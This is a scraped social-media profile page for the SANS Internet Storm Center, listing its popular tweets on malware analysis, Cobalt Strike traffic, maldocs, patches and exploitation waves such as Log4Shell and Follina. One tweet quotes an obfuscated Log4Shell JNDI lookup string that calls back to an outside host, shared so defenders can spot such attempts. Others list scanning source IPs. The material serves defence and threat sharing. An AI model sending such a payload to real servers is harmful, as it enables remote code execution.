SANS.edu Internet Storm Center Profile Banner
SANS.edu Internet Storm Center Profile
SANS.edu Internet Storm Center

@sans_isc

Followers
115,730
Following
86
Media
2,373
Statuses
13,019

@sans_isc @infosec .exchange - - Global Network Security Information Sharing Community -

Jacksonville, FL, USA
Joined June 2007
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
@sans_isc
SANS.edu Internet Storm Center
4 years
To whoever is trying to run these Python backdoors on our F5 #BigIP honeypot: Slow down... it doesn't work because you keep overwriting your files. Or randomize your filenames better.
Tweet media one
18
214
892
@sans_isc
SANS.edu Internet Storm Center
3 years
Hunting phishing websites with favicon hashes
Tweet media one
6
189
621
@sans_isc
SANS.edu Internet Storm Center
10 months
Brute-Force ZIP Password Cracking with : FP Fix
Tweet media one
3
118
546
@sans_isc
SANS.edu Internet Storm Center
1 month
A quick note about xz-utils backdoor: 1 - luckily, this was caught early. 2 - most run xz-utils 5.2/5.4. 5.6 is bad. 3 - quick check: `xz -V` 4 - Thanks to people who paid attention
23
203
546
@sans_isc
SANS.edu Internet Storm Center
11 months
Brute-Force ZIP Password Cracking with
Tweet media one
4
81
466
@sans_isc
SANS.edu Internet Storm Center
4 years
Sooty: SOC Analyst's All-in-One Tool
Tweet media one
7
118
455
@sans_isc
SANS.edu Internet Storm Center
2 years
Example of how attackers are trying to push crypto miners via Log4Shell
Tweet media one
5
154
450
@sans_isc
SANS.edu Internet Storm Center
2 years
guess we no longer have to worry about CVE-2022-1388 if this makes the rounds... @f5 #bigip
Tweet media one
9
133
396
@sans_isc
SANS.edu Internet Storm Center
2 years
#log4shell is now a @cnn headline. This means: This is no longer an emergency. Going back to infocon green. Log4j will be a multi-year marathon. Do not treat it like a sprint or you will run out of breath quickly.
8
88
386
@sans_isc
SANS.edu Internet Storm Center
2 years
Wireshark 3.6.0 Released
Tweet media one
2
41
347
@sans_isc
SANS.edu Internet Storm Center
4 years
Broken phishing accidentally exploiting Outlook zero-day
Tweet media one
5
128
329
@sans_isc
SANS.edu Internet Storm Center
3 years
Let's see if a kitten picture will get us to 100k followers by the end of the month ;-) #networkcats #kittens #networksupportkitten #evilbutcute
Tweet media one
28
45
311
@sans_isc
SANS.edu Internet Storm Center
2 years
Over 20 thousand servers have their iLO exposed to the internet, many are outdated and vulnerable
Tweet media one
8
120
307
@sans_isc
SANS.edu Internet Storm Center
3 years
Decrypting Cobalt Strike Traffic With a "Leaked" Private Key
Tweet media one
0
103
279
@sans_isc
SANS.edu Internet Storm Center
3 years
Wireshark 3.4.4 Released
Tweet media one
0
75
264
@sans_isc
SANS.edu Internet Storm Center
2 years
Top sources of CVE-2021-44228 exploit attempts. 45.155.205.233 (hostway[.]ru), 171.25.193 (tor exits) 185.220.100.242 (tor exit) 18.27.197.252 (MIT[.]edu) #log4j2 #log4j #cve202144228
Tweet media one
11
138
259
@sans_isc
SANS.edu Internet Storm Center
3 years
New Release of Sysmon Adding Detection for Process Tampering
Tweet media one
2
70
255
@sans_isc
SANS.edu Internet Storm Center
3 years
Active Directory Certificate Services (ADCS - PKI) domain admin vulnerability
Tweet media one
0
117
248
@sans_isc
SANS.edu Internet Storm Center
2 years
OpenSSL 3.0.7 is out. TL&DR: Punycode issue with international domains used in certs. Needs CA to sign malicious cert. Doesn't look like a "huge deal" IMHO. Relax.. Patch.. Repeat... #openssl
4
111
249
@sans_isc
SANS.edu Internet Storm Center
2 years
ISC diary: Emotet returns on Monday 2021-11-15, and @malware_traffic reviews recent activity
Tweet media one
3
125
250
@sans_isc
SANS.edu Internet Storm Center
2 years
Seeing now #log4shell exploit attempts that obfuscate: ${jndi:${lower:l}${lower:d}a${lower:p}://world80[.]log4j[.]bin${upper:a}ryedge[.]io:80/callback} and also ldaps vs ldap. This particular attempt is from Binaryedge (researcher scans)
Tweet media one
4
103
245
@sans_isc
SANS.edu Internet Storm Center
4 years
so far I found 4 domains registered yesterday with the keyword "Beirut". They appear to be inactive so far. Be careful out there. Verify any entities asking for help. #beirut #lebanon
Tweet media one
0
155
225
@sans_isc
SANS.edu Internet Storm Center
3 years
Simple Powershell Ransomware Creating a 7Z Archive of your Files
Tweet media one
1
82
218
@sans_isc
SANS.edu Internet Storm Center
3 years
TCPView v4.0 Released
Tweet media one
1
65
228
@sans_isc
SANS.edu Internet Storm Center
1 year
Detecting (Malicious) OneNote Documents
Tweet media one
0
64
216
@sans_isc
SANS.edu Internet Storm Center
2 years
Decrypting Cobalt Strike Traffic With Keys Extracted From Process Memory
Tweet media one
0
61
208
@sans_isc
SANS.edu Internet Storm Center
3 years
Video: Cobalt Strike & DNS - Part 1
Tweet media one
1
70
204
@sans_isc
SANS.edu Internet Storm Center
3 years
Decoding Cobalt Strike Traffic
1
77
202
@sans_isc
SANS.edu Internet Storm Center
3 years
Malware Analysis with elastic-agent and Microsoft Sandbox
Tweet media one
0
52
192
@sans_isc
SANS.edu Internet Storm Center
2 years
Please remember: Port 445 is just ONE of the ports that may reach #RPC (CVE-2022-26809) on Windows. #MSRPC does Port 135 (and high port) or in some cases HTTP as well. Don't "close some ports" but "only open ports you need open". #allowlist #dontblocklist
3
74
194
@sans_isc
SANS.edu Internet Storm Center
2 years
We are so far seeing 3 main types of useragents exploiting #log4jshell : - "bingsearchlib[.]com" (not related to Bing/MSFT AFAIK) - modified AutoMate 1.0 user agent - user-agent with Base64 encoded exploit.
Tweet media one
5
87
191
@sans_isc
SANS.edu Internet Storm Center
2 years
New Microsoft Office Attack Vector via "ms-msdt" Protocol Scheme
Tweet media one
2
78
189
@sans_isc
SANS.edu Internet Storm Center
5 years
Tip: BASE64 Encoded PowerShell Scripts are Recognizable by the Amount of Letter As
Tweet media one
3
94
189
@sans_isc
SANS.edu Internet Storm Center
3 years
CyberChef: Analyzing OOXML Files for URLs
Tweet media one
1
76
190
@sans_isc
SANS.edu Internet Storm Center
2 years
James Webb JPEG With Malware
Tweet media one
5
55
184
@sans_isc
SANS.edu Internet Storm Center
2 years
The #msdt 0-day currently being exploited can be blocked by removing the handler. Note that this may block legit uses (but not sure there are any/enough to not apply this workaround).
@DidierStevens
Didier Stevens
2 years
FYI:
Tweet media one
Tweet media two
Tweet media three
2
78
364
2
100
186
@sans_isc
SANS.edu Internet Storm Center
2 years
And Here They Come Again: DNS Reflection Attacks #dns #abitofarant #oneofthosedays
Tweet media one
2
48
177
@sans_isc
SANS.edu Internet Storm Center
4 years
F5 BigIP vulnerability exploitation followed by a backdoor implant attempt
Tweet media one
0
72
173
@sans_isc
SANS.edu Internet Storm Center
3 years
PCAPs and Beacons
Tweet media one
1
52
178
@sans_isc
SANS.edu Internet Storm Center
2 years
ISC Diary: @malware_traffic reviews new #MetaStealer malware first seen on 2022-03-30
Tweet media one
1
57
171
@sans_isc
SANS.edu Internet Storm Center
3 years
Attackers Exploiting WebLogic Servers via CVE-2020-14882 to install Cobalt Strike @oracle #weblogic
Tweet media one
1
70
172
@sans_isc
SANS.edu Internet Storm Center
4 years
Analysis of a triple-encrypted AZORult downloader
Tweet media one
2
92
172
@sans_isc
SANS.edu Internet Storm Center
2 years
Excel 4 Emotet Maldoc Analysis using CyberChef
Tweet media one
6
52
165
@sans_isc
SANS.edu Internet Storm Center
2 years
First Exploitation of Follina Seen in the Wild
Tweet media one
3
76
166
@sans_isc
SANS.edu Internet Storm Center
3 years
Finding Metasploit & Cobalt Strike URLs
Tweet media one
0
72
165
@sans_isc
SANS.edu Internet Storm Center
3 years
PuTTy And FileZilla Use The Same Fingerprint Registry Keys
Tweet media one
1
39
161
@sans_isc
SANS.edu Internet Storm Center
4 years
Current Top IPs scanning for #BigIP #CVE20205902 @f5Networks . cve-2020-5902 117.107.193.98 - Chinese EDU 103.220.209.47 - India Broadband 93.173.92.102 -Israel ISP 18.185.237.34 -Amazon EU 58.49.50.122 - Chinanet 52.119.83.108 -US Mobile ISP 179.9.166.185 -Chile ISP
7
76
153
@sans_isc
SANS.edu Internet Storm Center
4 years
The Microsoft DNS #sigred vulnerability (CVE-2020-1350) : drop what you are doing and patch it now (if this isn’t what your are doing..) if you don’t run MSFT DNS: double check...
3
101
152
@sans_isc
SANS.edu Internet Storm Center
2 years
December 2021 ISC Forensic Challenge - Review the #pcap for a chance at winning a Raspberry Pi
Tweet media one
3
50
149
@sans_isc
SANS.edu Internet Storm Center
2 years
Quickie: CyberChef & Microsoft Script Decoding
Tweet media one
2
48
150
@sans_isc
SANS.edu Internet Storm Center
2 years
RCE in log4j, Log4Shell, or how things can get bad quickly
Tweet media one
1
76
149
@sans_isc
SANS.edu Internet Storm Center
3 years
ISC diary - @malware_traffic presents a #pcap of infection traffic for a new #TrafficAnalysisQuiz
Tweet media one
3
31
144
@sans_isc
SANS.edu Internet Storm Center
3 years
Facebook Outage: Yes, its DNS (sort of). A super quick analysis of what is going on.
Tweet media one
2
79
143
@sans_isc
SANS.edu Internet Storm Center
4 years
Windows 10 Built-in Packet Sniffer - PktMon
Tweet media one
1
65
141
@sans_isc
SANS.edu Internet Storm Center
3 years
Quick Tip: Cobalt Strike Beacon Analysis
Tweet media one
0
38
137
@sans_isc
SANS.edu Internet Storm Center
2 years
HTML phishing attachments - now with anti-analysis features
Tweet media one
4
54
134
@sans_isc
SANS.edu Internet Storm Center
2 years
ISC Diary: @malware_traffic reviews #TA570 #CVE -2022-30190 ( #Follina ) exploit (ms-msdt) for #Qakbot
Tweet media one
1
59
133
@sans_isc
SANS.edu Internet Storm Center
2 years
Attackers are abusing MSBuild to evade defenses and implant Cobalt Strike beacons
Tweet media one
0
62
131
@sans_isc
SANS.edu Internet Storm Center
3 years
Quickie: Extracting HTTP URLs With tshark
Tweet media one
2
37
133
@sans_isc
SANS.edu Internet Storm Center
3 years
Shipping to Elasticsearch Microsoft DNS Logs
Tweet media one
0
37
131
@sans_isc
SANS.edu Internet Storm Center
1 year
CyberChef Version 10 Released
Tweet media one
1
51
130
@sans_isc
SANS.edu Internet Storm Center
5 years
Tip: Sysmon Will Log DNS Queries
Tweet media one
0
56
131
@sans_isc
SANS.edu Internet Storm Center
4 years
After the initial flurry of scanning for the #WebLogic flaw yesterday, we are now seeing some "actual" exploit attempts. And of course, people poping calc.exe. If your WebLogic server has a Calculator running this morning: You have a problem!
Tweet media one
2
79
130
@sans_isc
SANS.edu Internet Storm Center
3 years
Agent Tesla hidden in a historical anti-malware tool
Tweet media one
1
49
123
@sans_isc
SANS.edu Internet Storm Center
4 years
DeepBlueCLI: Powershell Threat Hunting
Tweet media one
0
55
128
@sans_isc
SANS.edu Internet Storm Center
3 years
ISC diary: @malware_traffic reviews an infection from 2020-10-30 for Emotet -> Qakbot -> more Emotet
Tweet media one
1
40
127
@sans_isc
SANS.edu Internet Storm Center
2 years
ISC Diary: @malware_traffic reviews how #Emotet #spambot traffic no longer uses 0.0.0.0
Tweet media one
0
44
121
@sans_isc
SANS.edu Internet Storm Center
2 years
ISC Diary: @malware_traffic reviews #Matanbuchus activity leading to #CobaltStrike
Tweet media one
2
41
125
@sans_isc
SANS.edu Internet Storm Center
3 years
Building an IDS Sensor with Suricata & Zeek with Logs to ELK
Tweet media one
3
42
125
@sans_isc
SANS.edu Internet Storm Center
1 year
Bypassing PowerShell Strong Obfuscation
Tweet media one
0
34
120
@sans_isc
SANS.edu Internet Storm Center
3 years
Hunting for Phishing Sites Masquerading as Outlook Web Access
Tweet media one
3
35
122
@sans_isc
SANS.edu Internet Storm Center
2 years
Translating Saitama's DNS tunneling messages
Tweet media one
1
48
119
@sans_isc
SANS.edu Internet Storm Center
3 years
Quick Tip: Extracting all VBA Code from a Maldoc
Tweet media one
0
49
119
@sans_isc
SANS.edu Internet Storm Center
3 years
.docx With Embedded EXE
Tweet media one
0
34
115
@sans_isc
SANS.edu Internet Storm Center
3 years
YARA and CyberChef
Tweet media one
0
32
113
@sans_isc
SANS.edu Internet Storm Center
4 years
Malicious Excel Sheet with a NULL VT Score
Tweet media one
4
49
112
@sans_isc
SANS.edu Internet Storm Center
3 years
Quick Tip: Extracting all VBA Code from a Maldoc - JSON Format
Tweet media one
1
29
115
@sans_isc
SANS.edu Internet Storm Center
3 years
Maldoc Analysis With CyberChef
Tweet media one
0
34
115
@sans_isc
SANS.edu Internet Storm Center
3 years
Malware analysis - From small BAT file to Mass Logger infostealer
Tweet media one
0
38
113
@sans_isc
SANS.edu Internet Storm Center
3 years
Summer of SAM - incorrect permissions on Windows 10/11 hives
Tweet media one
2
51
114
@sans_isc
SANS.edu Internet Storm Center
3 years
ISC diary - @malware_traffic reviews a #Qakbot ( #Qbot ) infection with #CobaltStrike
Tweet media one
0
38
113
@sans_isc
SANS.edu Internet Storm Center
3 years
ISC diary: @malware_traffic offers another traffic anlaysis quiz with Windows-based malware traffic
Tweet media one
3
27
114
@sans_isc
SANS.edu Internet Storm Center
3 years
ISC diary: @malware_traffic analyzes this month's forensic quiz #BazaLoader #CobaltStrike #AnchorDNS
Tweet media one
0
46
108
@sans_isc
SANS.edu Internet Storm Center
2 years
Traffic Light Protocol (TLP) 2.0 is here
Tweet media one
1
62
110
@sans_isc
SANS.edu Internet Storm Center
2 years
Analyzing Obfuscated VBS with CyberChef
Tweet media one
0
28
112
@sans_isc
SANS.edu Internet Storm Center
6 years
Meltdown and Spectre: clearing up the confusion
3
101
111
@sans_isc
SANS.edu Internet Storm Center
3 years
Analyzing FireEye Maldocs
Tweet media one
0
45
109
@sans_isc
SANS.edu Internet Storm Center
3 years
Tweet media one
2
48
109
@sans_isc
SANS.edu Internet Storm Center
3 years
ISC diary by @malware_traffic - Excel spreadsheet --> enable macros --> #SystemBC --> #CobaltStrike
Tweet media one
2
51
107
@sans_isc
SANS.edu Internet Storm Center
2 years
Analyzing a Phishing Word Document
Tweet media one
1
38
101
@sans_isc
SANS.edu Internet Storm Center
2 years
Log4Shell exploited to implant coin miners
Tweet media one
0
39
105
@sans_isc
SANS.edu Internet Storm Center
2 years
ISC Diary: @malware_traffic reviews an example of #CobaltStrike from an #Emotet infection
Tweet media one
1
47
106
@sans_isc
SANS.edu Internet Storm Center
4 years
Local Malware Analysis with Malice
Tweet media one
0
30
103
@sans_isc
SANS.edu Internet Storm Center
3 years
ISC diary by @malware_traffic : yet another traffic anlaysis quiz with Windows-based malware traffic
Tweet media one
4
30
105
@sans_isc
SANS.edu Internet Storm Center
2 years
Log4j / Log4Shell Followup: What we see and how to defend #log4shell #log4j #log4js
Tweet media one
1
56
105
@sans_isc
SANS.edu Internet Storm Center
11 months
ISC Diary: @malware_traffic reviews DocuSign-themed email leads to script-based infection
Tweet media one
0
28
102
@sans_isc
SANS.edu Internet Storm Center
3 years
Example of Cleartext Cobalt Strike Traffic (Thanks Brad)
Tweet media one
0
27
102
@sans_isc
SANS.edu Internet Storm Center
3 years
Jumping into Shellcode
Tweet media one
3
41
100
@sans_isc
SANS.edu Internet Storm Center
6 years
Firefox confirms web-based exploitation of Meltdown/Spectre possible, patch ASAP. https://blog.mozil
1
124
98
@sans_isc
SANS.edu Internet Storm Center
2 years
More Undetected PowerShell Dropper
Tweet media one
0
24
102